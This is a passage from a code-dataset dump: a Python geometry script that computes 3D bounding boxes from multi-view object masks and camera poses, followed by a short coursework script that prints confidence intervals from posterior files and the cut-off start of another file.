ray is perpendicular to the normal vector of plane, there is no intersection\n # (i.e. That is, intersection points are not considered when each ray is on the plane as well as when it is parallel to the plane)\n # 1-2) check λ >= 0 (In fact, the bbox is always in front of all cameras. So we don't need to check it. But.. we check it just for safety)\n # 2) Find the intersection of the rays' plane and bbox's edges\n\n # 1)\n for r in raydirs:\n for i in range(r.shape[0]):\n if np.abs(r[i]) <= error_bound:\n # The ray is perpendicular to the i_axis(this is the normal vector of planes which are i = i_max, i = i_min), i = x, y, z\n continue\n else:\n # get λ which satisfies c_t[i] + λ * r[i] = i_max, i_min\n i_max, i_min = bbox[i], bbox[i+3]\n lam_max = (i_max - c_t[i]) / r[i]\n lam_min = (i_min - c_t[i]) / r[i]\n if lam_max >= -error_bound:\n inter_point = c_t + lam_max * r\n if (bbox[((i+1)%3)+3] <= inter_point[(i+1)%3] and inter_point[(i+1)%3] <= bbox[(i+1)%3]) and \\\n (bbox[((i+2)%3)+3] <= inter_point[(i+2)%3] and inter_point[(i+2)%3] <= bbox[(i+2)%3]):\n intersection_list.append(inter_point.copy())\n if lam_min >= -error_bound:\n inter_point = c_t + lam_min * r\n if (bbox[((i+1)%3)+3] <= inter_point[(i+1)%3] and inter_point[(i+1)%3] <= bbox[(i+1)%3]) and \\\n (bbox[((i+2)%3)+3] <= inter_point[(i+2)%3] and inter_point[(i+2)%3] <= bbox[(i+2)%3]):\n intersection_list.append(inter_point.copy())\n # 2)\n # First, consider the rays' plane which constructed by c_t, r1, r2 : dot(n, (x,y,z) - c_t) = 0, n = r1 × r2\n # Next, consider edges of bbox\n # There are 12 edges\n # Each edge has a fixed value for two axes, and bounded values(end points of interval) for the other axis\n # Now, consider an edge with y and z values y0 and z0, and x values from x_min to x_max\n # 1) dot(n, (x,y0,z0) - c_t) = 0 => n_x(x - c_tx) = -n_y(y0 - c_ty) - n_z(z0 - c_tz)\n # 2) If n_x = 0, the edge is on the plane or the edge and the plane are parallel. This does not need to be considered because \n # 2-1) If the edge and rays don't meet, we don't need to cut the bbox\n # 2-2) If the edge and rays meet, this case was considered in 1) already\n # 3) If n_x ≠ 0, the edge and the plane meet at most one point : x0 = (-n_y(y0 - c_ty) - n_z(z0 - c_tz)) / n_x + c_tx\n # 4) Check the point is valid\n # 4-1) x_min <= x0 <= x_max ?\n # 4-2) Is the point in between the two rays?\n n = cross(r1, r2)\n for i in range(n.shape[0]):\n if np.abs(n[i]) <= error_bound:\n continue\n i_min, i_max = bbox[i+3], bbox[i]\n fixed_value_1 = bbox[((i+1)%3) + 3], bbox[(i+1)%3]\n fixed_value_2 = bbox[((i+2)%3) + 3], bbox[(i+2)%3]\n for j in range(2):\n v1 = fixed_value_1[j]\n for k in range(2):\n v2 = fixed_value_2[k]\n # get point of intersection\n inter_point = np.zeros((3,1))\n inter_point[i] = (-n[(i+1)%3] * (v1 - c_t[(i+1)%3]) -n[(i+2)%3] * (v2 - c_t[(i+2)%3])) / n[i] + c_t[i]\n inter_point[(i+1)%3] = v1\n inter_point[(i+2)%3] = v2\n # check validation 4-1)\n if i_min <= inter_point[i] and inter_point[i] <= i_max:\n # check validation 4-2)\n # 1) cos(r, r1) > 0 or cos(r, r2) > 0 (because of FOV < 180 degree)\n # 2) cos(r1, r2) <= cos(r, r1) and cos(r1, r2) <= cos(r, r2)\n r = inter_point - c_t\n r1_r2_cos = dot_product_unit(r1, r2)\n r_r1_cos = dot_product_unit(r, r1)\n r_r2_cos = dot_product_unit(r, r2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n # point of intersection exists on ray plane!\n intersection_list.append(inter_point.copy())\n \n return intersection_list\n\ndef Is_point_in_ray_view(p, ray_pair_list, c):\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the point to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c, a point = p\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c) = 0 => λ = dot(n, c - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n # Since ||n|| ≠ 0, λ <= 0 <=> dot(n, c - p) <= 0\n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n if np.dot(n.T, c - p) > error_bound:\n is_in_ray = False\n break \n return is_in_ray\n\ndef Is_ray_in_ray_view(r, c_t, ray_pair_list, c):\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # Is the target ray r in the base rays's field of view?\n # We just need to check the point, p = c_t + λ' * r, is in the base rays's field of view when λ' = inf\n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the point to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c, a point = p = c_t + λ' * r\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c) = 0 => λ = dot(n, c - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n \n # Now, let's simplify the above process(λ' = inf)\n # λ <= 0 <=> dot(n, c - p) <= 0 <=> dot(n, c - c_t - λ' * r) <= 0 <=> dot(n, c - c_t) - λ' * dot(n, r) <= 0 <=> [dot(n, r) > 0] or [dot(n, r) = 0, dot(n, c - c_t) <= 0] \n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n if np.dot(n.T, r) < -error_bound:\n is_in_ray = False\n break\n elif np.abs(np.dot(n.T, r)) <= error_bound:\n if np.dot(n.T, c - c_t) > error_bound:\n is_in_ray = False\n break\n return is_in_ray\n\ndef get_bbox_corners_in_ray_view(bbox, ray_pair_list, c_t):\n # bbox = xmax, ymax, zmax, xmin, ymin, zmin\n # ray_pair_list = [(r_top_left, r_top_right), ...]\n \n # All cross products of two rays (i.e. r1 × r2) have inward direction of the ray's field of view. Because our ray order is set clock wise manner\n # So, we do the following:\n # 1) get the normal vectors from each of the two rays\n # 2) get the normal vectors from the corner of bbox to each plane\n # 3) The directions of each normal vector pair in 1) and 2) must be opposite\n # Let denote n = r1 × r2, and camera center = c_t, a corner point = p\n # Then we can find the normal vector at point p by solving the following equation\n # dot(n, p + λ*n - c_t) = 0 => λ = dot(n, c_t - p) / ||n||^2\n # So the normal vector at point p is λ*n (= p + λ*n - p)\n # If λ <= 0 for all plane, p is in rays' field of view\n\n # 1)\n ray_normal_list = []\n for ray_pair in ray_pair_list:\n ray_normal_list.append(cross(ray_pair[0], ray_pair[1]))\n \n # 2), 3)\n corner_in_rays_list = []\n corner = np.zeros((3,1))\n for i in range(2):\n for j in range(2):\n for k in range(2):\n corner[0] = bbox[i*3]\n corner[1] = bbox[j*3 + 1]\n corner[2] = bbox[k*3 + 2]\n\n is_in_ray = True\n for n in ray_normal_list:\n # norm of normal cannot be zero\n if np.linalg.norm(n) <= error_bound:\n raise Exception(\"normal cannot be zero vector\")\n lam = np.dot(n.T, c_t - corner) / np.square(np.linalg.norm(n))\n if lam > error_bound:\n is_in_ray = False\n break \n if is_in_ray:\n corner_in_rays_list.append(corner.copy())\n \n return corner_in_rays_list\n\ndef make_bbox(masks, cam, extend_ratio, reliable_ratio, use_inf_bbox_to_bounded=False):\n '''\n Robust 3D bounding box generation algorithm with calibrated cameras and 2D bounding boxes\n Assumptions\n 1) A few 2D bounding boxes (masks) are poor, but most masks are reliable\n 1-1) 'poor' includes not only the segmentation quality, but also whether the mask completely contains the object\n Thus, Most images should completely contain the object(i.e. the image quality is also included)\n 2) There is an area that all camera views see in common\n 3) Rays(half lines) goes in the positive direction : ray = c + λ * r, λ >= 0\n 4) FOV is less than 180 degree for all cameras\n 5) Camera format should be OpenCV : X_im = K (R @ X_world + t)\n 6) image coordinate : x - right, y - bottom\n All 3D points and direction vectors have (3,1) shape\n Time complexity\n 1) When all views(images) completely contain the object(so, object is not clipped)\n O(n), n = # of views(masks)\n 2) Some views do not fully contain objects(so, object is clipped in some images)\n O(n^2)\n ----------------------------------------------------------------------\n Above versions are not implemented because they can be covered some extent by heuristics : just using `extend_ratio`\n (When the ratio of the cut part is small compared to the overall size of the object)\n 3) We assume that objects in some views are partially clipped\n O(n)\n '''\n\n base_mask = list(masks.keys())[0]\n select_ray = [(\"top_left\",\"top_right\"), (\"top_right\",\"bottom_right\"), (\"bottom_right\",\"bottom_left\"), (\"bottom_left\",\"top_left\")] # clock-wise manner for right-had rule\n \n # compute camera center and ray direction(ray direction for image corner)\n # Let c : camera center, r : ray direction, then equation of ray : c + λ * r, λ >= 0\n cam_center_dict = {}\n ray_direction_dict = {}\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R, t = pose[:3, :3], pose[:3, 3:]\n K = cam[\"intrinsic_\"+str(frame_num)]\n cam_center_dict[mask_name] = -R.T @ t\n # image coordinate : x - right, y - bottom\n y, x = np.where(masks[mask_name])\n ray_direction_dict[mask_name] = {\"top_left\": compute_ray_direction(R, K, y.min(), x.min()), \"top_right\": compute_ray_direction(R, K, y.min(), x.max()),\n \"bottom_left\": compute_ray_direction(R, K, y.max(), x.min()), \"bottom_right\": compute_ray_direction(R, K, y.max(), x.max())}\n \n # Check validation\n # Assumption\n # 1. Rays goes in the positive direction. ray = c + λ * r, λ >= 0\n # 2. FOV is less than 180 degree for all cameras\n # 3. Ignore distortion of cameras\n # We assume 3 then validate 1, 2.\n # How?\n # R.T @ (0,0,1).T : camera center ray ; X_cam = R @ X_world + t => R.T @ λ*(0, 0, 1).T - R.T @ t = X_world => camera center ray = R.T @ (0, 0, 1).T, λ >= 0\n # If dot((unit(camera center ray), unit(r)) <= 0, then 1 or 2 is false (But this can not detect [1 false and 2 false]. We ignore it)\n # This is not a direct measurement of FOV, but it doesn't matter. This is equivalent\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n cam_center_ray = R.T @ np.array([0, 0, 1]).reshape(3,1)\n for key in ray_direction_dict[mask_name].keys():\n if dot_product_unit(cam_center_ray, ray_direction_dict[mask_name][key]) <= error_bound:\n raise Exception(\"Camera ray doesn't satisfy assumption!\\n\\\n mask_name : {mask_name}, frame_num : {frame_num}\".format(mask_name=mask_name, frame_num=cam[mask_name]))\n \n # get 3D bboxes made by two 2D bbox (base view and each of the other views)\n bbox_3d_each_view_dict = {}\n c_base = cam_center_dict[base_mask] # -R0.T @ t0\n base_raydir_dict = ray_direction_dict[base_mask]\n\n for mask_name in masks.keys():\n if mask_name == base_mask:\n continue\n bbox_3d_each_view_dict[mask_name] = []\n c_t = cam_center_dict[mask_name] # -R.T @ t\n target_raydir_dict = ray_direction_dict[mask_name]\n\n # Compute intersection of two planes(base plane and target palne)\n for base_order in select_ray:\n r_b1 = base_raydir_dict[base_order[0]]\n r_b2 = base_raydir_dict[base_order[1]]\n for target_order in select_ray:\n r_t1 = target_raydir_dict[target_order[0]]\n r_t2 = target_raydir_dict[target_order[1]]\n bbox_3d_each_view_dict[mask_name].extend(get_intersection_of_two_planes((r_b1, r_b2), (r_t1, r_t2), c_base, c_t))\n\n # Check the camera center is in the rays's field of view\n base_ray_pairs = []\n target_ray_pairs = []\n for ray_order in select_ray:\n base_r1 = base_raydir_dict[ray_order[0]]\n base_r2 = base_raydir_dict[ray_order[1]]\n base_ray_pairs.append((base_r1, base_r2))\n t_r1 = target_raydir_dict[ray_order[0]]\n t_r2 = target_raydir_dict[ray_order[1]]\n target_ray_pairs.append((t_r1, t_r2))\n if Is_point_in_ray_view(c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(c_t)\n if Is_point_in_ray_view(c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(c_base)\n\n # Check the target(base) ray is in the base(target) rays' field of view\n # If target(base) ray is in the base(target) rays' field of view, intersection point has infinite value\n for key in target_raydir_dict.keys():\n r = target_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n for key in base_raydir_dict.keys():\n r = base_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n\n # use minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target view are constructed\n # Next, get a 3D bbox, which is the intersection of all above 3D bboxes\n xmax, ymax, zmax = np.inf, np.inf, np.inf\n xmin, ymin, zmin = -np.inf, -np.inf, -np.inf\n for key in bbox_3d_each_view_dict.keys():\n vertex_list = bbox_3d_each_view_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n max_points = np.max(vertices, -1)\n min_points = np.min(vertices, -1)\n \n xmax = max_points[0] if xmax > max_points[0] else xmax\n ymax = max_points[1] if ymax > max_points[1] else ymax\n zmax = max_points[2] if zmax > max_points[2] else zmax\n\n xmin = min_points[0] if xmin < min_points[0] else xmin\n ymin = min_points[1] if ymin < min_points[1] else ymin\n zmin = min_points[2] if zmin < min_points[2] else zmin\n\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n import pdb\n pdb.set_trace()\n \n # Check validatoin\n # Assumption : There is an area that all camera views see in common\n # Thus, we check _min < _max\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"There should be an area that all camera views see in common\")\n\n # bbox should have bounded size\n # When generating meshes for the train, the bbox should be clear. Therefore, scenes in which bbox has an inf value are excluded for train\n # However, there are some cases when we want to train only the visible part without worrying about the invisible part\n # For such cases, set bbox to force\n bbox = [xmax, ymax, zmax, xmin, ymin, zmin]\n if use_inf_bbox_to_bounded:\n max_value = np.max(np.where(np.abs(bbox) < np.inf, np.abs(bbox), 0))\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n bbox[i] = max_value * np.sign(bbox[i])\n # Exclude bbox which has infinite value\n else:\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n return (None, None, None, None, None, None)\n\n # For clipped object masks\n # reliable_ratio isn't used now\n for i in range(3):\n mid_point = (bbox[i] + bbox[i+3]) / 2.0\n half_dist = (bbox[i] - bbox[i+3]) / 2.0\n bbox[i] = mid_point + extend_ratio * half_dist\n bbox[i+3] = mid_point - extend_ratio * half_dist\n\n return bbox\n\n '''\n For 1) and 2)\n base_mask = list(masks.keys())[0]\n select_ray = [(\"top_left\",\"top_right\"), (\"top_right\",\"bottom_right\"), (\"bottom_right\",\"bottom_left\"), (\"bottom_left\",\"top_left\")] # clock-wise manner for right-had rule\n \n # compute camera center and ray direction(ray direction for image corner)\n # Let c : camera center, r : ray direction, then equation of ray : c + λ * r, λ >= 0\n cam_center_dict = {}\n ray_direction_dict = {}\n for mask_name in masks.keys():\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R, t = pose[:3, :3], pose[:3, 3:]\n K = cam[\"intrinsic_\"+str(frame_num)]\n cam_center_dict[mask_name] = -R.T @ t\n # image coordinate : x - right, y - bottom\n H, W = masks[mask_name].shape\n ray_direction_dict[mask_name] = {\"top_left\": compute_ray_direction(R, K, 0, 0), \"top_right\": compute_ray_direction(R, K, 0, W),\n \"bottom_left\": compute_ray_direction(R, K, H, 0), \"bottom_right\": compute_ray_direction(R, K, H, W)}\n\n # Check validation\n # Assumption\n # 1. Rays goes in the positive direction. ray = c + λ * r, λ >= 0\n # 2. FOV is less than 180 degree for all cameras\n # 3. Ignore distortion of cameras\n # We assume 3 then validate 1, 2.\n # How?\n # R.T @ t : vector that camera center to origin\n # If dot((unit(R.T @ t), unit(r)) <= 0, then 1 or 2 is false\n # This is not a direct measurement of FOV, but it doesn't matter. This is equivalent\n for mask_name in masks.keys():\n center_to_orient_vec = -cam_center_dict[mask_name]\n for key in ray_direction_dict[mask_name].keys():\n if dot_product_unit(center_to_orient_vec, ray_direction_dict[mask_name][key]) <= error_bound:\n raise Exception(\"Camera ray doesn't satisfy assumption!\\n\\\n mask_name : {mask_name}, frame_num : {frame_num}\".format(mask_name=mask_name, frame_num=cam[mask_name]))\n\n ############################################# First, get 3D boudning box from image corners #############################################\n # Why perform this process? #\n # we can't know which mask is reliable(in automation pipeline). So we can't set base mask #\n #########################################################################################################################################\n \n # get 3D bboxes made by two views (base view and each of the other views)\n bbox_3d_each_view_dict = {}\n c_base = cam_center_dict[base_mask] # -R0.T @ t0\n base_raydir_dict = ray_direction_dict[base_mask]\n\n for mask_name in masks.keys():\n if mask_name == base_mask:\n continue\n bbox_3d_each_view_dict[mask_name] = []\n c_t = cam_center_dict[mask_name] # -R.T @ t\n target_raydir_dict = ray_direction_dict[mask_name]\n # Compute intersection of two planes(base plane and target palne)\n for base_order in select_ray:\n r_b1 = base_raydir_dict[base_order[0]]\n r_b2 = base_raydir_dict[base_order[1]]\n for target_order in select_ray:\n r_t1 = target_raydir_dict[target_order[0]]\n r_t2 = target_raydir_dict[target_order[1]]\n bbox_3d_each_view_dict[mask_name].extend(get_intersection_of_two_planes((r_b1, r_b2), (r_t1, r_t2), c_base, c_t))\n\n # Check the camera center is in the rays's field of view\n base_ray_pairs = []\n target_ray_pairs = []\n for ray_order in select_ray:\n base_r1 = base_raydir_dict[ray_order[0]]\n base_r2 = base_raydir_dict[ray_order[1]]\n base_ray_pairs.append((base_r1, base_r2))\n t_r1 = target_raydir_dict[ray_order[0]]\n t_r2 = target_raydir_dict[ray_order[1]]\n target_ray_pairs.append((t_r1, t_r2))\n if Is_point_in_ray_view(c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(c_t)\n if Is_point_in_ray_view(c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(c_base)\n\n # Check the target(base) ray is in the base(target) rays' field of view\n # If target(base) ray is in the base(target) rays' field of view, intersection point has infinite value\n for key in target_raydir_dict.keys():\n r = target_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_t, base_ray_pairs, c_base):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n for key in base_raydir_dict.keys():\n r = base_raydir_dict[key]\n if Is_ray_in_ray_view(r, c_base, target_ray_pairs, c_t):\n bbox_3d_each_view_dict[mask_name].append(make_infinite_point_of_ray(r))\n\n # use minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target view are constructed\n # Next, get a 3D bbox, which is the intersection of all above 3D bboxes\n xmax, ymax, zmax = np.inf, np.inf, np.inf\n xmin, ymin, zmin = -np.inf, -np.inf, -np.inf\n for key in bbox_3d_each_view_dict.keys():\n vertex_list = bbox_3d_each_view_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n max_points = np.max(vertices, -1)\n min_points = np.min(vertices, -1)\n \n xmax = max_points[0] if xmax > max_points[0] else xmax\n ymax = max_points[1] if ymax > max_points[1] else ymax\n zmax = max_points[2] if zmax > max_points[2] else zmax\n\n xmin = min_points[0] if xmin < min_points[0] else xmin\n ymin = min_points[1] if ymin < min_points[1] else ymin\n zmin = min_points[2] if zmin < min_points[2] else zmin\n \n # Check validatoin\n # Assumption : There is an area that all camera views see in common\n # Thus, we check _min < _max\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"There should be an area that all camera views see in common\")\n \n # bbox should have bounded size\n # When generating meshes for the train, the bbox should be clear. Therefore, scenes in which bbox has an inf value are excluded for train\n # However, there are some cases when we want to train only the visible part without worrying about the invisible part\n # For such cases, set bbox to force\n if use_inf_bbox_to_bounded:\n max_value = np.max(np.where(np.abs(bbox) < np.inf, np.abs(bbox), 0))\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n bbox[i] = max_value * np.sign(bbox[i])\n # Exclude bbox which has infinite value\n else:\n for i in range(len(bbox)):\n if np.abs(bbox[i]) == np.inf:\n return (None, None, None, None, None, None)\n\n ########################################### Next, modify 3D boudning box from 2D bbox corners ###########################################\n # Cut 3D bbox which is obtaied above using 2D bboxes # \n #########################################################################################################################################\n\n bbox_3d_each_mask_dict = {}\n for mask_name in masks.keys():\n bbox_3d_each_mask_dict[mask_name] = []\n H, W = masks[mask_name].shape\n\n # get 2D bbox\n y, x = np.where(masks[mask_name])\n # get camera center\n c_t = cam_center_dict[mask_name]\n # get camera matrix\n frame_num = cam[mask_name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n K = cam[\"intrinsic_\"+str(frame_num)]\n # get rays from 2D bbox corners\n # If an object is clipped from the image, the ray that cuts the object should not cut the bbox \n rays = {}\n if x.min() > 0 and y.min() > 0:\n rays[\"top_left\"] = compute_ray_direction(R, K, y.min(), x.min())\n if x.max() < W - 1 and y.min() > 0:\n rays[\"top_right\"] = compute_ray_direction(R, K, y.min(), x.max())\n if x.max() < W - 1 and y.max() < H - 1:\n rays[\"bottom_right\"] = compute_ray_direction(R, K, y.max(), x.max())\n if x.min() > 0 and y.max() < H - 1:\n rays[\"bottom_left\"] = compute_ray_direction(R, K, y.max(), x.min())\n\n valid_ray_pairs = []\n for ray_order in select_ray:\n if ray_order[0] in rays.keys() and ray_order[1] in rays.keys():\n r1 = rays[ray_order[0]]\n r2 = rays[ray_order[1]]\n valid_ray_pairs.append((r1, r2))\n\n for ray_pair in valid_ray_pairs:\n # get intersection of rays and bbox\n bbox_3d_each_mask_dict[mask_name].extend(get_intersection_of_rays_and_bbox(bbox, ray_pair, c_t))\n \n # To make it clear what will be cut, we add the corners of the bbox within the rays's field of view\n # Use right-hand rule for cross product\n if len(valid_ray_pairs) > 0:\n bbox_3d_each_mask_dict[mask_name].extend(get_bbox_corners_in_ray_view(bbox, valid_ray_pairs, c_t))\n\n # use robust minmax for 3D bbox\n # First, 3D bboxes including a convex polyhedron obtained from each target mask are constructed\n # Next, get a 3D bbox, which is the intersection of all the above `reliable` 3D bboxes\n # Let denote r := reliable_ratio, then we ignore the max values of the lower 1-r ratios and the min values of the upper 1-r ratios.\n max_points = None\n min_points = None\n for key in bbox_3d_each_mask_dict.keys():\n vertex_list = bbox_3d_each_mask_dict[key]\n if len(vertex_list) > 0:\n vertices = np.hstack(vertex_list) # 3 × len(vertex_list) vector\n if max_points is None:\n max_points = np.max(vertices, -1)\n else:\n max_points = np.vstack([max_points, np.max(vertices, -1)])\n if min_points is None:\n min_points = np.min(vertices, -1)\n else:\n min_points = np.vstack([min_points, np.min(vertices, -1)])\n\n max_points = np.sort(max_points, 0)\n min_points = np.sort(min_points, 0)[::-1]\n\n N = len(masks)\n select_num = N - int(N*reliable_ratio)\n if select_num == N:\n raise Exception(\"There is no appropriate 3D bbox\")\n xmax, ymax, zmax = max_points[select_num]\n xmin, ymin, zmin = min_points[select_num]\n \n # Check validatoin\n if xmax <= xmin or ymax <= ymin or zmax <= zmin:\n raise Exception(\"Most of masks should be reliable\")\n \n return xmax, ymax, zmax, xmin, ymin, zmin\n '''\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--mask_dir\", required=True, type=str)\n parser.add_argument(\"--camera_dir\", required=True, type=str)\n parser.add_argument(\"--output_dir\", required=True, type=str)\n parser.add_argument(\"--cam_file_type\", required=True, type=str, help=\"txt | npz\")\n parser.add_argument(\"--mask_threshold\", default=0.3, type=float, help=\"a parameter that changes the mask values to binary when mask values are continuous\")\n parser.add_argument(\"--reliable_ratio\", default=1.0, type=float, help=\"rate of reliable masks\")\n parser.add_argument(\"--extend_ratio\", default=1.2, type=float, help=\"1 / extend_ratio = clipped ratio\")\n parser.add_argument(\"--use_inf_bbox_to_bounded\", action=\"store_true\", help=\"Bound the box with the inf value to an appropriate value\")\n args = parser.parse_args()\n\n # get mask and camera\n masks_list = os.listdir(args.mask_dir)\n mask_paths = [os.path.join(args.mask_dir, mask) for mask in masks_list if (\".png\" in mask or \".jpg\" in mask)]\n\n cam_file_type = args.cam_file_type\n cam = {}\n if cam_file_type == \"txt\":\n # txt type : assume camera parameter in txt file and file names of img and cam are same\n for i, mask in enumerate(mask_paths):\n mask_name = mask.split(\"/\")[-1]\n k_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_k.txt\")\n r_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_r.txt\")\n t_path = os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_t.txt\")\n if os.path.isfile(k_path) and os.path.isfile(r_path) and os.path.isfile(t_path):\n K = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_k.txt\"))\n pose = np.eye(4)\n pose[:3, :3] = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_r.txt\"))\n pose[:3, 3] = np.loadtxt(os.path.join(args.mask_dir, mask_name.split(\".\")[0]+\"_t.txt\")) \n cam[mask_name] = str(i)\n cam[\"pose_\"+str(i)] = pose\n cam[\"intrinsic_\"+str(i)] = K\n elif cam_file_type == \"npz\":\n # npz type : assume there is just one npz file in the camera directory\n # assume cam has (image_file_name, frame num) pair\n cam_org_path = [path for path in os.listdir(args.camera_dir) if \".npz\" in path]\n if len(cam_org_path) != 1:\n raise Exception(\"There should be only one camera file!\")\n cam_org_path = cam_org_path[0]\n cam_org = np.load(os.path.join(args.camera_dir, cam_org_path))\n for mask_path in mask_paths:\n mask_name = mask_path.split(\"/\")[-1]\n image_name = \".\".join(mask_name.split(\".\")[0:2])\n if image_name in cam_org.keys():\n frame_num = str(cam_org[image_name])\n cam[mask_name] = frame_num\n cam[\"pose_\"+frame_num] = cam_org[\"pose_\"+frame_num]\n cam[\"intrinsic_\"+frame_num] = cam_org[\"intrinsic_\"+frame_num] \n else:\n raise Exception(\"data type must dvr or co3d\")\n \n masks = {}\n for mask_path in mask_paths:\n mask_name = mask_path.split(\"/\")[-1]\n if cam_file_type == \"txt\":\n if mask_name not in cam.keys():\n continue\n elif cam_file_type == \"npz\":\n if mask_name not in cam.keys():\n continue\n else:\n raise Exception(\"data type must dvr or co3d\")\n\n mask = np.array(Image.open(mask_path), dtype=np.float32)\n mask /= 255.0\n if len(mask.shape) == 3:\n # Does the alpha value role as a mask?\n if mask.shape[2] == 4:\n mask = mask[:, :, 3]\n else:\n mask = mask[:, :, 0]\n mask = (mask > args.mask_threshold)\n \n # Exclude black image\n y, x = np.where(mask)\n if len(x) != 0 and len(y) != 0:\n masks[mask_name] = mask\n\n # make 3d bbox\n xmax, ymax, zmax, xmin, ymin, zmin = make_bbox(masks, cam, args.extend_ratio, args.reliable_ratio, args.use_inf_bbox_to_bounded)\n try:\n xmax, ymax, zmax, xmin, ymin, zmin = make_bbox(masks, cam, args.extend_ratio, args.reliable_ratio, args.use_inf_bbox_to_bounded)\n except:\n print(\"Some error in {mask_dir}\".format(mask_dir=args.mask_dir))\n return\n if xmax == None:\n # Infinity bounding box\n print(\"We can't make bbox for {mask_dir}\".format(mask_dir=args.mask_dir))\n return\n\n bbox_path = os.path.join(args.output_dir, \"bbox.txt\")\n with open(bbox_path, 'w') as f:\n f.write(\"{xmin} {ymin} {zmin}\\n\".format(xmin=xmin, ymin=ymin, zmin=zmin))\n f.write(\"{xmax} {ymax} {zmax}\".format(xmax=xmax, ymax=ymax, zmax=zmax))\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"snuvclab/chupa","sub_path":"src/normal_nds/make_bbox.py","file_name":"make_bbox.py","file_ext":"py","file_size_in_byte":47565,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"285320537","text":"import numpy as np\nimport math\nimport matplotlib as plt\nimport matplotlib.pyplot as plt\nfrom mpmath import*\nimport os\nfiletorun = os.getcwd() + \"\\Set 2\\confidence interval set2.py\"\nexec(open(filetorun).read())\nfile1 = os.getcwd() + '\\Set 2\\ps2_posterior_05.txt'\nfile2 = os.getcwd() + '\\Set 2\\ps2_posterior_10.txt'\nfile3 = os.getcwd() + '\\Set 2\\ps2_posterior_20-1.txt'\nfile4 = os.getcwd() + '\\Set 2\\ps2_posterior_50.txt'\nfileArray = [file1,file2,file3,file4]\nprint(fileArray)\nconvertedFileArray = [None]*4\nfor f in range(len(fileArray)):\n convertedFileArray[f] = np.loadtxt(fileArray[f])\n actingArray = convertedFileArray[f]\n print(ConfidenceInterval(actingArray[0:,0],actingArray[0:,1], .68))\n print(ConfidenceInterval(actingArray[0:,0],actingArray[0:,1], .95))\n#print(convertedFileArray)\n","repo_name":"MarcosP7635/Ge-Ay117","sub_path":"Set 2/set2 problem3.py","file_name":"set2 problem3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3232296417","text":"from math import sqrt, inf\n\nimport numpy as np\n\n\ndef distance(x, y):\n return sqrt((x[0] - 